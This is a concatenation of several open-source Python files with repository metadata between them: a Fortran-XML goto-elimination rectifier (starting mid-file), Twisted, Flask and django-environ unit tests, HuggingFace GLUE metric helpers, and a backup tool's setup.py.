index_boundary.append(index)
if "goto-stmt" in stmt.attrib:
if (
main_loop_lbl != stmt.attrib['lbl']
and stmt.attrib['lbl'] not in labels
):
nested_gotos_exist = True
label_after_lbl = stmt.attrib['lbl']
index_boundary.append(index)
index += 1
return nested_gotos_exist
def construct_goto_loop(
self, parent, reconstruct_target, nested_gotos_exist,
multiple_goto_stmts, number_of_gotos, declared_label_flag_num,
traverse, target_label_lbl
):
"""This function constructs loop syntax tree for goto
backward case.
Args:
parent (:obj: 'ET'): Parent element of loop.
reconstruct_target (dict): A dictionary that
will hold nested goto statement.
nested_gotos_exist (bool): Boolean to indicating
whether nested goto exists or not.
multiple_goto_stmts (list): A list of goto and other
statements.
number_of_gotos (int): Number of gotos to reconstruct.
declared_label_flag_num (list): List of flag numbers.
traverse (int): Current traverse counter.
target_label_lbl (list): A single value list that
holds the label value of <label>.
Returns:
None.
"""
cur_elem_parent = parent
current_goto_num = 1
end_of_current_goto_loop = False
for i in range(number_of_gotos):
loop_elem = ET.SubElement(cur_elem_parent, "loop",
{"type": "do-while"})
header_elem = ET.SubElement(loop_elem, "header")
# The outermost flag == N and the innermost flag == 1
flag_num = declared_label_flag_num[i]
name = f"label_flag_{str(flag_num)}"
name_attrib = {
"hasSubscripts": "false",
"id": name,
"type": "ambiguous",
}
name_elem = ET.SubElement(header_elem, "name", name_attrib)
flag_name = name
body_elem = ET.SubElement(loop_elem, "body")
# Keep a track of the parent and grandparent elements
grand_parent_elem = cur_elem_parent
cur_elem_parent = body_elem
# Since reconstruction of multiple goto is done from outermost
# to the inner, we are not constructing any subelements until
# all encapsulating loops are created first
if current_goto_num == number_of_gotos:
for statements in multiple_goto_stmts:
index = 0
for stmt in statements:
if len(stmt) > 0:
if nested_gotos_exist:
self.nested_goto_handler(
reconstruct_target, statements,
body_elem, traverse
)
nested_gotos_exist = False
else:
elems = ET.SubElement(
body_elem, stmt.tag, stmt.attrib
)
for child in stmt:
if (
child.tag == "goto-stmt"
and target_label_lbl[0] ==
child.attrib['target_label']
):
# Conditional
if "conditional-goto-stmt" in stmt.attrib:
self.generate_assignment_element(
elems, flag_name,
self.conditional_op, None, None,
traverse
)
# Unconditional
else:
self.generate_assignment_element(
elems, flag_name, None,
"literal", "true", traverse
)
end_of_current_goto_loop = True
else:
child_elem = ET.SubElement(
elems, child.tag, child.attrib
)
if len(child) > 0:
self.parseXMLTree(
child, child_elem, elems,
parent, traverse
)
# If end_of_current_goto_loop is True,
# escape one loop out to continue
# construct statements
if end_of_current_goto_loop:
body_elem = grand_parent_elem
end_of_current_goto_loop = False
flag_name = f"label_flag_" \
f"{str(number_of_gotos + i - 1)}"
index += 1
else:
current_goto_num += 1
def nested_goto_handler(
self, reconstruct_target, statements,
body_elem, traverse
):
"""This function collects forward goto case
related statements under the backward goto
boundary. Then, it calls goto_after function
to reconstruct goto.
Args:
reconstruct_target (list): A list that holds
statements for reconstruction.
statements (:obj: 'ET'): Statements for
reconstructions.
body_elem (:obj: 'ET'): Body element of
the loop.
traverse (int): Current traverse counter.
"""
reconstruct_target['stmts-follow-goto'] \
= statements[index_scope[0]:index_scope[1]]
reconstruct_target['stmts-follow-label'] \
= statements[index_scope[1]]
reconstruct_target['count-gotos'] \
= 1
self.reconstruct_goto_after_label(
body_elem, traverse, reconstruct_target
)
self.statements_to_reconstruct_after[
'stmts-follow-goto'] = []
def statement_recovery (self, statements_to_recover, parent, traverse):
"""This function is for recovering any existing statements
that follow reconstructed loop.
Args:
statements_to_recover (list): A list of statements.
parent (:obj: 'ET'): A prent element.
traverse (int): Current traverse counter.
"""
for recover_stmt in statements_to_recover:
statement = ET.SubElement(
parent, recover_stmt.tag, recover_stmt.attrib
)
for child in recover_stmt:
child_elem = ET.SubElement(
statement, child.tag, child.attrib
)
if len(child) > 0:
self.parseXMLTree(
child, child_elem, statement, parent, traverse
)
#################################################################
# #
# NON-CLASS FUNCTIONS #
# #
#################################################################
def is_empty(elem):
"""This function is just a helper function for
check whether the passed elements (i.e. list)
is empty or not
Args:
elem (:obj:): Any structured data object (i.e. list).
Returns:
bool: True if element is empty or false if not.
"""
if not elem:
return True
else:
return False
def indent(elem, level=0):
"""This function indents each level of XML.
Source:
https://stackoverflow.com/questions/3095434/inserting-newlines
-in-xml-file-generated-via-xml-etree-elementstree-in-python
Args:
elem (:obj: 'ET'): An XML root.
level (int): A root level in integer.
Returns:
None.
"""
i = "\n" + level * " "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def buildNewASTfromXMLString(
xmlString: str,
original_fortran_file: str,
module_log_file_path: str
) -> Tuple[ET.Element, List]:
"""This function processes OFP generated XML and generates a rectified
version by recursively calling the appropriate functions.
Args:
xmlString (str): XML as a string
original_fortran_file (str): Path to the original Fortran file
module_log_file_path (str): Path to the module_log_file
Returns:
ET object: A reconstructed element object.
"""
xml_generator = RectifiedXMLGenerator()
# We need the absolute path of Fortran file to lookup in the modLogFile.json
xml_generator.original_fortran_file_abs_path = \
os.path.abspath(original_fortran_file)
xml_generator.module_log_file_path = module_log_file_path
traverse = 1
ofpAST = ET.XML(xmlString)
# A root of the new AST
newRoot = ET.Element(ofpAST.tag, ofpAST.attrib)
# First add the root to the new AST list
for child in ofpAST:
# Handle only non-empty elements
if child.text:
cur_elem = ET.SubElement(newRoot, child.tag, child.attrib)
xml_generator.parseXMLTree(child, cur_elem, newRoot, newRoot, traverse)
# Indent and structure the tree properly
tree = ET.ElementTree(newRoot)
indent(newRoot)
# Checks if the rectified AST requires goto elimination,
# if it does, it does a 2nd traversal to eliminate and
# reconstruct the AST once more
while (xml_generator.need_goto_elimination):
oldRoot = newRoot
traverse += 1
xml_generator.boundary_identifier()
newRoot = ET.Element(oldRoot.tag, oldRoot.attrib)
for child in oldRoot:
if child.text:
cur_elem = ET.SubElement(newRoot, child.tag, child.attrib)
xml_generator.parseXMLTree(child, cur_elem, newRoot, newRoot,
traverse)
tree = ET.ElementTree(newRoot)
indent(newRoot)
if not xml_generator.continue_elimination:
xml_generator.need_goto_elimination = False
return newRoot, xml_generator.module_files_to_process
def parse_args():
"""This function parse the arguments passed to the script.
It returns a tuple of (input ofp xml, output xml)
file names.
Args:
None.
Returns:
None.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-f",
"--file",
nargs="+",
help="OFP generated XML file needs to be passed.",
)
parser.add_argument(
"-g",
"--gen",
nargs="+",
help="A rectified version of XML.",
)
args = parser.parse_args(sys.argv[1:])
if (
args.file is not None
and args.gen is not None
):
ofpFile = args.file[0]
rectifiedFile = args.gen[0]
else:
assert (
False
), f"[[ Missing either input or output file.\
Input: {args.file}, Output: {args.gen} ]]"
return (ofpFile, rectifiedFile)
def fileChecker(filename, mode):
"""This function checks for the validity (file existence and
mode). If either the file does not exist or the mode is
not valid, throws an IO exception and terminates the program
Args:
filename (str): A file name that reconstructed XMl
will be written to.
mode (str): Mode to open the file in.
Returns:
None.
"""
try:
with open(filename, mode) as f:
pass
except IOError:
assert (
False
), f"File {filename} does not exit or invalid mode {mode}."
if __name__ == "__main__":
(ofpFile, rectifiedFile) = parse_args()
# Since we pass the file name to the element
# tree parser not opening it with open function,
# we check for the validity before the file name
# is actually passed to the parser
fileChecker(ofpFile, "r")
ofpXML = ET.parse(ofpFile)
ofpXMLRoot = ofpXML.getroot()
# Converts the XML tree into string
ofpXMLStr = ET.tostring(ofpXMLRoot).decode()
# Call buildNewASTfromXMLString to rectify the XML
rectifiedXML = buildNewASTfromXMLString(ofpXMLStr)
rectifiedTree = ET.ElementTree(rectifiedXML)
# The write function is used with the generated
# XML tree object not with the file object. Thus,
# same as the ofpFile, we do a check for the validity
# of a file before pass to the ET tree object's write
# function
fileChecker(rectifiedFile, "w")
rectifiedTree.write(rectifiedFile)
| 40.388869
| 145
| 0.493026
|
8b98168c036790f54815ab801947e54f490fb585
| 896
|
py
|
Python
|
twisted/python/logger/test/test_levels.py
|
ioggstream/twisted
|
34f9b1e3f097685839000c656332c66ee85be5d8
|
[
"Unlicense",
"MIT"
] | null | null | null |
twisted/python/logger/test/test_levels.py
|
ioggstream/twisted
|
34f9b1e3f097685839000c656332c66ee85be5d8
|
[
"Unlicense",
"MIT"
] | null | null | null |
twisted/python/logger/test/test_levels.py
|
ioggstream/twisted
|
34f9b1e3f097685839000c656332c66ee85be5d8
|
[
"Unlicense",
"MIT"
] | null | null | null |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for L{twisted.python.logger._levels}.
"""
from twisted.trial import unittest
from .._levels import InvalidLogLevelError
from .._levels import LogLevel
class LogLevelTests(unittest.TestCase):
"""
Tests for L{LogLevel}.
"""
def test_levelWithName(self):
"""
Look up log level by name.
"""
for level in LogLevel.iterconstants():
self.assertIdentical(LogLevel.levelWithName(level.name), level)
def test_levelWithInvalidName(self):
"""
You can't make up log level names.
"""
bogus = "*bogus*"
try:
LogLevel.levelWithName(bogus)
except InvalidLogLevelError as e:
self.assertIdentical(e.level, bogus)
else:
self.fail("Expected InvalidLogLevelError.")
| 22.974359
| 75
| 0.628348
|
b27a074872adfa7fb1c466bd946d8075231d04f5
| 1,387
|
py
|
Python
|
app/models_tests.py
|
codingbreak/account-sharing-proxy-server
|
e572da9ac867897079479ce97daeee14ae373ab5
|
[
"MIT"
] | 3
|
2021-09-15T16:15:54.000Z
|
2022-01-25T05:38:53.000Z
|
app/models_tests.py
|
codingbreak/account-sharing-proxy-server
|
e572da9ac867897079479ce97daeee14ae373ab5
|
[
"MIT"
] | 5
|
2021-12-28T11:53:17.000Z
|
2022-01-21T14:40:19.000Z
|
app/models_tests.py
|
codingbreak/account-sharing-proxy-server
|
e572da9ac867897079479ce97daeee14ae373ab5
|
[
"MIT"
] | null | null | null |
from flask import g
from database import db, User, Credential, Shared_User
def test_create_user_account(test_app):
with test_app.app_context():
guest = User(username="guest", email="guest@example.com")
db.session.add(guest)
db.session.commit()
assert User.query.filter_by(username="guest").first() == guest
def test_create_credential(session):
guest = User(username="guest", email="guest@example.com")
guest_wsj_cre = Credential(website="https://www.wsj.com/", user=guest)
session.add(guest)
session.add(guest_wsj_cre)
session.commit()
assert (
Credential.query.filter_by(website="https://www.wsj.com/").first()
== guest_wsj_cre
)
def test_share_credential(session):
guest = User(username="guest", email="guest@example.com")
guest_wsj_cre = Credential(website="https://www.wsj.com/", user=guest)
session.add(guest)
session.add(guest_wsj_cre)
session.commit()
guest_friend = User(username="guest_friend", email="guest_friend@example.com")
guest_wsj_cre_to_guest_friend = Shared_User(
credential=guest_wsj_cre, shared_user=guest_friend
)
session.add(guest_friend)
session.add(guest_wsj_cre_to_guest_friend)
session.commit()
assert (
Shared_User.query.filter_by(shared_user=guest_friend).first().credential.user
== guest
)
| 29.510638
| 85
| 0.695746
|
3bb437602dc7c8e6cfc2c0f5eeb123b76da38cb9
| 3,226
|
py
|
Python
|
src/transformers/data/metrics/__init__.py
|
dmlap/transformers
|
79588e6fdb5af8add092fc27dd695ea1ebc68b18
|
[
"Apache-2.0"
] | 77
|
2020-11-12T18:40:25.000Z
|
2022-03-27T06:41:30.000Z
|
src/transformers/data/metrics/__init__.py
|
dmlap/transformers
|
79588e6fdb5af8add092fc27dd695ea1ebc68b18
|
[
"Apache-2.0"
] | 7
|
2021-03-11T14:00:58.000Z
|
2022-01-18T05:51:22.000Z
|
src/transformers/data/metrics/__init__.py
|
dmlap/transformers
|
79588e6fdb5af8add092fc27dd695ea1ebc68b18
|
[
"Apache-2.0"
] | 23
|
2020-12-08T12:42:24.000Z
|
2022-02-11T13:55:24.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from scipy.stats import pearsonr, spearmanr
from sklearn.metrics import matthews_corrcoef, f1_score
_has_sklearn = True
except (AttributeError, ImportError):
_has_sklearn = False
def is_sklearn_available():
return _has_sklearn
if _has_sklearn:
def simple_accuracy(preds, labels):
return (preds == labels).mean()
def acc_and_f1(preds, labels):
acc = simple_accuracy(preds, labels)
f1 = f1_score(y_true=labels, y_pred=preds)
return {
"acc": acc,
"f1": f1,
"acc_and_f1": (acc + f1) / 2,
}
def pearson_and_spearman(preds, labels):
pearson_corr = pearsonr(preds, labels)[0]
spearman_corr = spearmanr(preds, labels)[0]
return {
"pearson": pearson_corr,
"spearmanr": spearman_corr,
"corr": (pearson_corr + spearman_corr) / 2,
}
def glue_compute_metrics(task_name, preds, labels):
assert len(preds) == len(
labels
), f"Predictions and labels have mismatched lengths {len(preds)} and {len(labels)}"
if task_name == "cola":
return {"mcc": matthews_corrcoef(labels, preds)}
elif task_name == "sst-2":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "mrpc":
return acc_and_f1(preds, labels)
elif task_name == "sts-b":
return pearson_and_spearman(preds, labels)
elif task_name == "qqp":
return acc_and_f1(preds, labels)
elif task_name == "mnli":
return {"mnli/acc": simple_accuracy(preds, labels)}
elif task_name == "mnli-mm":
return {"mnli-mm/acc": simple_accuracy(preds, labels)}
elif task_name == "qnli":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "rte":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "wnli":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "hans":
return {"acc": simple_accuracy(preds, labels)}
else:
raise KeyError(task_name)
def xnli_compute_metrics(task_name, preds, labels):
assert len(preds) == len(
labels
), f"Predictions and labels have mismatched lengths {len(preds)} and {len(labels)}"
if task_name == "xnli":
return {"acc": simple_accuracy(preds, labels)}
else:
raise KeyError(task_name)
| 35.844444
| 91
| 0.626162
|
804fd0aea8c6d20186d32c73162f2e762b1045ef
| 1,398
|
py
|
Python
|
setup.py
|
RyanCPeters/backup
|
4dc19602989fe7dc49ca409d786fc833d1fcabf9
|
[
"Apache-2.0"
] | 69
|
2016-06-29T16:13:55.000Z
|
2022-03-21T06:38:37.000Z
|
setup.py
|
RyanCPeters/backup
|
4dc19602989fe7dc49ca409d786fc833d1fcabf9
|
[
"Apache-2.0"
] | 237
|
2016-09-28T02:12:34.000Z
|
2022-03-25T13:32:23.000Z
|
setup.py
|
RyanCPeters/backup
|
4dc19602989fe7dc49ca409d786fc833d1fcabf9
|
[
"Apache-2.0"
] | 45
|
2017-01-04T21:20:27.000Z
|
2021-12-29T10:42:22.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
del os.link
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
with open("requirements.txt") as f:
requirements = f.read().strip().split("\n")
with open("requirements_dev.txt") as f:
test_requirements = f.read().strip().split("\n")
setup(
name="twindb-backup",
version="2.20.2",
description="TwinDB Backup tool for files, MySQL et al.",
long_description=readme + "\n\n" + history,
author="TwinDB Development Team",
author_email="dev@twindb.com",
url="https://github.com/twindb/twindb_backup",
packages=find_packages(exclude=("tests*",)),
package_dir={"twindb_backup": "twindb_backup"},
entry_points={"console_scripts": ["twindb-backup=twindb_backup.cli:main"]},
include_package_data=True,
install_requires=requirements,
license="Apache Software License 2.0",
zip_safe=False,
keywords="twindb_backup",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
],
test_suite="tests",
tests_require=test_requirements,
)
| 30.391304
| 79
| 0.670243
|
c0f40a57317e3250eccda478b01aab549f3a23c1
| 33,332
|
py
|
Python
|
environ/test.py
|
kaiman1234/django-environ
|
e01b362be2a0de0685458c19a5b62491c8a35cb9
|
[
"MIT"
] | 1
|
2021-12-30T16:24:34.000Z
|
2021-12-30T16:24:34.000Z
|
environ/test.py
|
kaiman1234/django-environ
|
e01b362be2a0de0685458c19a5b62491c8a35cb9
|
[
"MIT"
] | null | null | null |
environ/test.py
|
kaiman1234/django-environ
|
e01b362be2a0de0685458c19a5b62491c8a35cb9
|
[
"MIT"
] | null | null | null |
import os
import sys
import unittest
import warnings
from urllib.parse import quote
from .compat import json, DJANGO_POSTGRES, ImproperlyConfigured, REDIS_DRIVER
from environ import Env, Path
class BaseTests(unittest.TestCase):
URL = 'http://www.google.com/'
POSTGRES = 'postgres://uf07k1:wegauwhg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722'
MYSQL = 'mysql://bea6eb0:69772142@us-cdbr-east.cleardb.com/heroku_97681?reconnect=true'
MYSQLGIS = 'mysqlgis://user:password@127.0.0.1/some_database'
SQLITE = 'sqlite:////full/path/to/your/database/file.sqlite'
ORACLE_TNS = 'oracle://user:password@sid/'
ORACLE = 'oracle://user:password@host:1521/sid'
CUSTOM_BACKEND = 'custom.backend://user:password@example.com:5430/database'
REDSHIFT = 'redshift://user:password@examplecluster.abc123xyz789.us-west-2.redshift.amazonaws.com:5439/dev'
MEMCACHE = 'memcache://127.0.0.1:11211'
REDIS = 'rediscache://127.0.0.1:6379/1?client_class=django_redis.client.DefaultClient&password=secret'
EMAIL = 'smtps://user@domain.com:password@smtp.example.com:587'
JSON = dict(one='bar', two=2, three=33.44)
DICT = dict(foo='bar', test='on')
PATH = '/home/dev'
EXPORTED = 'exported var'
@classmethod
def generateData(cls):
return dict(STR_VAR='bar',
MULTILINE_STR_VAR='foo\\nbar',
INT_VAR='42',
FLOAT_VAR='33.3',
FLOAT_COMMA_VAR='33,3',
FLOAT_STRANGE_VAR1='123,420,333.3',
FLOAT_STRANGE_VAR2='123.420.333,3',
BOOL_TRUE_VAR='1',
BOOL_TRUE_VAR2='True',
BOOL_FALSE_VAR='0',
BOOL_FALSE_VAR2='False',
PROXIED_VAR='$STR_VAR',
INT_LIST='42,33',
INT_TUPLE='(42,33)',
STR_LIST_WITH_SPACES=' foo, bar',
EMPTY_LIST='',
DICT_VAR='foo=bar,test=on',
DATABASE_URL=cls.POSTGRES,
DATABASE_MYSQL_URL=cls.MYSQL,
DATABASE_MYSQL_GIS_URL=cls.MYSQLGIS,
DATABASE_SQLITE_URL=cls.SQLITE,
DATABASE_ORACLE_URL=cls.ORACLE,
DATABASE_ORACLE_TNS_URL=cls.ORACLE_TNS,
DATABASE_REDSHIFT_URL=cls.REDSHIFT,
DATABASE_CUSTOM_BACKEND_URL=cls.CUSTOM_BACKEND,
CACHE_URL=cls.MEMCACHE,
CACHE_REDIS=cls.REDIS,
EMAIL_URL=cls.EMAIL,
URL_VAR=cls.URL,
JSON_VAR=json.dumps(cls.JSON),
PATH_VAR=cls.PATH,
EXPORTED_VAR=cls.EXPORTED)
def setUp(self):
self._old_environ = os.environ
os.environ = Env.ENVIRON = self.generateData()
self.env = Env()
def tearDown(self):
os.environ = self._old_environ
def assertTypeAndValue(self, type_, expected, actual):
self.assertEqual(type_, type(actual))
self.assertEqual(expected, actual)
class EnvTests(BaseTests):
def test_not_present_with_default(self):
self.assertEqual(3, self.env('not_present', default=3))
def test_not_present_without_default(self):
self.assertRaises(ImproperlyConfigured, self.env, 'not_present')
def test_contains(self):
self.assertTrue('STR_VAR' in self.env)
self.assertTrue('EMPTY_LIST' in self.env)
self.assertFalse('I_AM_NOT_A_VAR' in self.env)
def test_str(self):
self.assertTypeAndValue(str, 'bar', self.env('STR_VAR'))
self.assertTypeAndValue(str, 'bar', self.env.str('STR_VAR'))
self.assertTypeAndValue(str, 'foo\\nbar', self.env.str('MULTILINE_STR_VAR'))
self.assertTypeAndValue(str, 'foo\nbar', self.env.str('MULTILINE_STR_VAR', multiline=True))
def test_bytes(self):
self.assertTypeAndValue(bytes, b'bar', self.env.bytes('STR_VAR'))
def test_int(self):
self.assertTypeAndValue(int, 42, self.env('INT_VAR', cast=int))
self.assertTypeAndValue(int, 42, self.env.int('INT_VAR'))
def test_int_with_none_default(self):
self.assertTrue(self.env('NOT_PRESENT_VAR', cast=int, default=None) is None)
def test_float(self):
self.assertTypeAndValue(float, 33.3, self.env('FLOAT_VAR', cast=float))
self.assertTypeAndValue(float, 33.3, self.env.float('FLOAT_VAR'))
self.assertTypeAndValue(float, 33.3, self.env('FLOAT_COMMA_VAR', cast=float))
self.assertTypeAndValue(float, 123420333.3, self.env('FLOAT_STRANGE_VAR1', cast=float))
self.assertTypeAndValue(float, 123420333.3, self.env('FLOAT_STRANGE_VAR2', cast=float))
def test_bool_true(self):
self.assertTypeAndValue(bool, True, self.env('BOOL_TRUE_VAR', cast=bool))
self.assertTypeAndValue(bool, True, self.env('BOOL_TRUE_VAR2', cast=bool))
self.assertTypeAndValue(bool, True, self.env.bool('BOOL_TRUE_VAR'))
def test_bool_false(self):
self.assertTypeAndValue(bool, False, self.env('BOOL_FALSE_VAR', cast=bool))
self.assertTypeAndValue(bool, False, self.env('BOOL_FALSE_VAR2', cast=bool))
self.assertTypeAndValue(bool, False, self.env.bool('BOOL_FALSE_VAR'))
def test_proxied_value(self):
self.assertEqual('bar', self.env('PROXIED_VAR'))
def test_int_list(self):
self.assertTypeAndValue(list, [42, 33], self.env('INT_LIST', cast=[int]))
self.assertTypeAndValue(list, [42, 33], self.env.list('INT_LIST', int))
def test_int_tuple(self):
self.assertTypeAndValue(tuple, (42, 33), self.env('INT_LIST', cast=(int,)))
self.assertTypeAndValue(tuple, (42, 33), self.env.tuple('INT_LIST', int))
self.assertTypeAndValue(tuple, ('42', '33'), self.env.tuple('INT_LIST'))
def test_str_list_with_spaces(self):
self.assertTypeAndValue(list, [' foo', ' bar'],
self.env('STR_LIST_WITH_SPACES', cast=[str]))
self.assertTypeAndValue(list, [' foo', ' bar'],
self.env.list('STR_LIST_WITH_SPACES'))
def test_empty_list(self):
self.assertTypeAndValue(list, [], self.env('EMPTY_LIST', cast=[int]))
def test_dict_value(self):
self.assertTypeAndValue(dict, self.DICT, self.env.dict('DICT_VAR'))
def test_dict_parsing(self):
self.assertEqual({'a': '1'}, self.env.parse_value('a=1', dict))
self.assertEqual({'a': 1}, self.env.parse_value('a=1', dict(value=int)))
self.assertEqual({'a': ['1', '2', '3']}, self.env.parse_value('a=1,2,3', dict(value=[str])))
self.assertEqual({'a': [1, 2, 3]}, self.env.parse_value('a=1,2,3', dict(value=[int])))
self.assertEqual({'a': 1, 'b': [1.1, 2.2], 'c': 3},
self.env.parse_value('a=1;b=1.1,2.2;c=3', dict(value=int, cast=dict(b=[float]))))
self.assertEqual({'a': "uname", 'c': "http://www.google.com", 'b': True},
self.env.parse_value('a=uname;c=http://www.google.com;b=True', dict(value=str, cast=dict(b=bool))))
def test_url_value(self):
url = self.env.url('URL_VAR')
self.assertEqual(url.__class__, self.env.URL_CLASS)
self.assertEqual(url.geturl(), self.URL)
self.assertEqual(None, self.env.url('OTHER_URL', default=None))
def test_url_encoded_parts(self):
password_with_unquoted_characters = "#password"
encoded_url = "mysql://user:%s@127.0.0.1:3306/dbname" % quote(password_with_unquoted_characters)
parsed_url = self.env.db_url_config(encoded_url)
self.assertEqual(parsed_url['PASSWORD'], password_with_unquoted_characters)
def test_db_url_value(self):
pg_config = self.env.db()
self.assertEqual(pg_config['ENGINE'], DJANGO_POSTGRES)
self.assertEqual(pg_config['NAME'], 'd8r82722')
self.assertEqual(pg_config['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(pg_config['USER'], 'uf07k1')
self.assertEqual(pg_config['PASSWORD'], 'wegauwhg')
self.assertEqual(pg_config['PORT'], 5431)
mysql_config = self.env.db('DATABASE_MYSQL_URL')
self.assertEqual(mysql_config['ENGINE'], 'django.db.backends.mysql')
self.assertEqual(mysql_config['NAME'], 'heroku_97681')
self.assertEqual(mysql_config['HOST'], 'us-cdbr-east.cleardb.com')
self.assertEqual(mysql_config['USER'], 'bea6eb0')
self.assertEqual(mysql_config['PASSWORD'], '69772142')
self.assertEqual(mysql_config['PORT'], '')
mysql_gis_config = self.env.db('DATABASE_MYSQL_GIS_URL')
self.assertEqual(mysql_gis_config['ENGINE'], 'django.contrib.gis.db.backends.mysql')
self.assertEqual(mysql_gis_config['NAME'], 'some_database')
self.assertEqual(mysql_gis_config['HOST'], '127.0.0.1')
self.assertEqual(mysql_gis_config['USER'], 'user')
self.assertEqual(mysql_gis_config['PASSWORD'], 'password')
self.assertEqual(mysql_gis_config['PORT'], '')
oracle_config = self.env.db('DATABASE_ORACLE_TNS_URL')
self.assertEqual(oracle_config['ENGINE'], 'django.db.backends.oracle')
self.assertEqual(oracle_config['NAME'], 'sid')
self.assertEqual(oracle_config['HOST'], '')
self.assertEqual(oracle_config['USER'], 'user')
self.assertEqual(oracle_config['PASSWORD'], 'password')
self.assertFalse('PORT' in oracle_config)
oracle_config = self.env.db('DATABASE_ORACLE_URL')
self.assertEqual(oracle_config['ENGINE'], 'django.db.backends.oracle')
self.assertEqual(oracle_config['NAME'], 'sid')
self.assertEqual(oracle_config['HOST'], 'host')
self.assertEqual(oracle_config['USER'], 'user')
self.assertEqual(oracle_config['PASSWORD'], 'password')
self.assertEqual(oracle_config['PORT'], '1521')
redshift_config = self.env.db('DATABASE_REDSHIFT_URL')
self.assertEqual(redshift_config['ENGINE'], 'django_redshift_backend')
self.assertEqual(redshift_config['NAME'], 'dev')
self.assertEqual(redshift_config['HOST'], 'examplecluster.abc123xyz789.us-west-2.redshift.amazonaws.com')
self.assertEqual(redshift_config['USER'], 'user')
self.assertEqual(redshift_config['PASSWORD'], 'password')
self.assertEqual(redshift_config['PORT'], 5439)
sqlite_config = self.env.db('DATABASE_SQLITE_URL')
self.assertEqual(sqlite_config['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(sqlite_config['NAME'], '/full/path/to/your/database/file.sqlite')
custom_backend_config = self.env.db('DATABASE_CUSTOM_BACKEND_URL')
self.assertEqual(custom_backend_config['ENGINE'], 'custom.backend')
self.assertEqual(custom_backend_config['NAME'], 'database')
self.assertEqual(custom_backend_config['HOST'], 'example.com')
self.assertEqual(custom_backend_config['USER'], 'user')
self.assertEqual(custom_backend_config['PASSWORD'], 'password')
self.assertEqual(custom_backend_config['PORT'], 5430)
def test_cache_url_value(self):
cache_config = self.env.cache_url()
self.assertEqual(cache_config['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(cache_config['LOCATION'], '127.0.0.1:11211')
redis_config = self.env.cache_url('CACHE_REDIS')
self.assertEqual(redis_config['BACKEND'], 'django_redis.cache.RedisCache')
self.assertEqual(redis_config['LOCATION'], 'redis://127.0.0.1:6379/1')
self.assertEqual(redis_config['OPTIONS'], {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
'PASSWORD': 'secret',
})
def test_email_url_value(self):
email_config = self.env.email_url()
self.assertEqual(email_config['EMAIL_BACKEND'], 'django.core.mail.backends.smtp.EmailBackend')
self.assertEqual(email_config['EMAIL_HOST'], 'smtp.example.com')
self.assertEqual(email_config['EMAIL_HOST_PASSWORD'], 'password')
self.assertEqual(email_config['EMAIL_HOST_USER'], 'user@domain.com')
self.assertEqual(email_config['EMAIL_PORT'], 587)
self.assertEqual(email_config['EMAIL_USE_TLS'], True)
def test_json_value(self):
self.assertEqual(self.JSON, self.env.json('JSON_VAR'))
def test_path(self):
root = self.env.path('PATH_VAR')
self.assertTypeAndValue(Path, Path(self.PATH), root)
def test_smart_cast(self):
self.assertEqual(self.env.get_value('STR_VAR', default='string'), 'bar')
self.assertEqual(self.env.get_value('BOOL_TRUE_VAR', default=True), True)
self.assertEqual(self.env.get_value('BOOL_FALSE_VAR', default=True), False)
self.assertEqual(self.env.get_value('INT_VAR', default=1), 42)
self.assertEqual(self.env.get_value('FLOAT_VAR', default=1.2), 33.3)
def test_exported(self):
self.assertEqual(self.EXPORTED, self.env('EXPORTED_VAR'))
class FileEnvTests(EnvTests):
def setUp(self):
super().setUp()
Env.ENVIRON = {}
self.env = Env()
file_path = Path(__file__, is_file=True)('test_env.txt')
self.env.read_env(file_path, PATH_VAR=Path(__file__, is_file=True).__root__)
class SubClassTests(EnvTests):
def setUp(self):
super().setUp()
self.CONFIG = self.generateData()
class MyEnv(Env):
ENVIRON = self.CONFIG
self.env = MyEnv()
def test_singleton_environ(self):
self.assertTrue(self.CONFIG is self.env.ENVIRON)
class SchemaEnvTests(BaseTests):
def test_schema(self):
env = Env(INT_VAR=int, NOT_PRESENT_VAR=(float, 33.3), STR_VAR=str,
INT_LIST=[int], DEFAULT_LIST=([int], [2]))
self.assertTypeAndValue(int, 42, env('INT_VAR'))
self.assertTypeAndValue(float, 33.3, env('NOT_PRESENT_VAR'))
self.assertEqual('bar', env('STR_VAR'))
self.assertEqual('foo', env('NOT_PRESENT2', default='foo'))
self.assertTypeAndValue(list, [42, 33], env('INT_LIST'))
self.assertTypeAndValue(list, [2], env('DEFAULT_LIST'))
# Override schema in this one case
self.assertTypeAndValue(str, '42', env('INT_VAR', cast=str))
class DatabaseTestSuite(unittest.TestCase):
def test_postgres_parsing(self):
url = 'postgres://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], DJANGO_POSTGRES)
